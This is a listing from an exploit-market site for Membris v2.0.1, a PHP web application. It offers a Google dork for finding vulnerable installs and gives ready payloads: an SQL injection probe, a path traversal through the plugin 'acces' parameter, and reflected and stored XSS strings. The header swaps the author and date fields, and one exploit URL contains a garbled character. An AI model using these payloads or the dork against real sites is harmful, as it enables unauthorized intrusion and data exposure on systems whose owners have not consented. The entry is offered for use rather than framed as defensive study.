[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities

Author
Dr.abolalh
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18417
Category
web applications
Date add
02-06-2012
Platform
php
###################################
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Author:01/06/2012
# E-Mail: xa3@hotmail.com
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
# Version: Membris v 2.0.1
###################################
 
# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.
 
 
 
SQL:
voir-actualites.php
 
Exploit:
voir-actualites.php?idn=1 '
 
+-----------------------------------------------------------+
 
File Inclusion
 
 
include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
 
Exploit:
admin/actions-plugin.php�acces=../index.php
 
+-----------------------------------------------------------+
 
XSS
search.php
 
Exploit:
search.php?req= XSS
 
search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+



#  0day.today [2024-12-26]  #